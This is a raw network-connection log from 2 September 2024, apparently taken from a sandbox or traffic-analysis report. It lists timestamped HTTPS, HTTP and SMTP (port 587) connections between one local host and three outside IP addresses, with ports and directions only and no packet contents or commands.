Sep 2, 2024 07:48:14.883584976 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.883622885 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.891295910 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.891316891 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.891376019 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.891382933 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.891426086 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.902523041 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.902539015 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.902627945 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.902641058 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.902679920 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.912332058 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.912350893 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.912431955 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.912445068 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.912498951 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.920610905 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.920629025 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.920712948 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.920727015 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.920769930 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.948947906 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.948965073 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.949057102 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.949079990 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.949121952 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.956437111 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.956458092 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.956538916 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.956549883 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.956588030 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.961605072 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.961621046 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.961710930 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.961720943 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.961774111 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.970283985 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.970304012 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.970381975 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.970390081 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.970436096 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.978086948 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.978107929 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.978189945 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.978203058 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.978244066 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.989058018 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.989073992 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.989135027 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.989146948 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.989186049 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.998426914 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.998441935 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.998526096 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:14.998538017 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:14.998581886 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.007577896 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.007594109 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.007673979 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.007687092 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.007735014 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.031519890 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.031538010 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.031644106 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.031670094 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.031706095 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.039221048 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.039237976 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.039330006 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.039340973 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.039376974 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.042426109 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.042440891 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.042500973 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.042519093 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.042566061 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.048964977 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.048981905 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.049088001 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.049099922 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.049145937 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.068233013 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.068248034 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.068432093 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.068449020 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.068523884 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.073039055 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.073052883 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.073175907 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.073189974 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.073236942 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.078833103 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.078846931 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.078922987 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.078933001 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.078973055 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.082137108 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.082201004 CEST	443	49705	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:15.082205057 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.082251072 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:15.085782051 CEST	49705	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:16.389004946 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:16.393752098 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:16.393826962 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:16.394056082 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:16.399028063 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:16.835444927 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:16.890520096 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:18.572101116 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:18.576888084 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:18.576986074 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.228571892 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.239900112 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.244925022 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.388793945 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.390918016 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.395704985 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.541775942 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.545917988 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.550647974 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.711422920 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.711437941 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.711450100 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.711466074 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.711513996 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.711549044 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.742455959 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.747314930 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.891084909 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:19.904647112 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:19.909420967 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.316804886 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.317065001 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.317143917 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:20.326474905 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:20.331373930 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.475527048 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.479492903 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:20.484288931 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.751588106 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.751912117 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:20.756788015 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.900319099 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:20.924032927 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:20.929019928 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.188088894 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.188285112 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:21.193098068 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.336627007 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.337676048 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:21.337745905 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:21.337769985 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:21.337798119 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:21.342473984 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.342581987 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.347261906 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.347273111 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.497380018 CEST	587	49709	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:21.656135082 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:31.467581034 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:31.467643023 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:31.467849970 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:31.471533060 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:31.471577883 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.343102932 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.343173981 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.349426985 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.349438906 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.349706888 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.364301920 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.404505968 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.793406963 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.843655109 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.843669891 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.890515089 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.947551012 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947566032 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947594881 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947612047 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947628021 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947640896 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.947659969 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.947683096 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.997507095 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.997519970 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.997533083 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.997549057 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.997574091 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:35.997589111 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:35.997601032 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.046782970 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.105185986 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105199099 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105233908 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105246067 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105261087 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105273008 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.105345011 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.105402946 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.145845890 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.145854950 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.145879030 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.145888090 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.145924091 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.145942926 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.145963907 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.145976067 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.194884062 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.194894075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.194922924 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.194977999 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.194993019 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.195024014 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.195036888 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.204776049 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.204794884 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.204859972 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.204869986 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.206301928 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.269201994 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.269222975 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.269308090 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.269324064 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.272208929 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.287221909 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.287239075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.287322044 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.287334919 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.288181067 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.306446075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.306463957 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.306514978 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.306526899 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.306557894 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.306576014 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.323256016 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.323273897 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.323319912 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.323328972 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.323359966 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.323379993 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.336360931 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.336380005 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.336425066 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.336431980 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.336458921 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.336474895 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.350482941 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.350509882 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.350589037 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.350605965 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.351469994 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.363301992 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.363322020 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.363393068 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.363405943 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.363460064 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.414426088 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.414450884 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.414534092 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.414557934 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.414593935 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.414616108 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.426131964 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.426151037 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.426215887 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.426234961 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.426475048 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.434693098 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.434710026 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.434783936 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.434801102 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.435637951 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.446069956 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.446088076 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.446139097 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.446149111 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.446180105 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.446196079 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.454402924 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.454426050 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.454499006 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.454510927 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.454526901 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.454546928 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.462302923 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.462323904 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.462491989 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.462507010 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.463251114 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.470895052 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.470910072 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.470967054 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.470982075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.471100092 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.478883028 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.478898048 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.478962898 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.478972912 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.479074955 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.500916004 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.500935078 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.500992060 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.501005888 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.501056910 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.512450933 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.512465954 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.512525082 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.512535095 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.512581110 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.532812119 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.532826900 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.532906055 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.532927990 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.534622908 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.545591116 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.545608044 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.545664072 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.545675039 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.545727015 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.550668955 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.550687075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.550863981 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.550874949 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.550921917 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.555502892 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.555526018 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.555576086 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.555586100 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.555596113 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.555691957 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.564506054 CEST	443	49711	5.144.130.41	192.168.2.8
